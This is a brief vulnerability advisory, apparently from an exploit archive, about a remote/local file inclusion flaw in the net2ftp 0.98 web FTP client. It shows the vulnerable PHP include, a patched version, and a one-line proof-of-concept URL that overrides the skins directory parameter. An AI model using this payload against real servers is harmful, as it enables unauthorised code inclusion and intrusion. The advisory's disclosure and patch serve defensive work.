net2ftp Stable 0.98 RFI/LFI Vulnerability

=========================================
net2ftp Stable 0.98 RFI/LFI Vulnerability
=========================================

net2ftp is web based ftp client used by many web shared hosting
////////////////////////////////////////////////////////////////////
Vuln is in file skins/mobile/admin1.template.php:
 
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>
 
///////////////////////////////////////////////////////////////////
Pathed Version:
<?php
defined("NET2FTP") or die("Direct access to this location is not allowed.");
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");
?>
 
//////////////////////////////////////////////////////////////////
POC:
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil



#  0day.today [2018-02-20]  #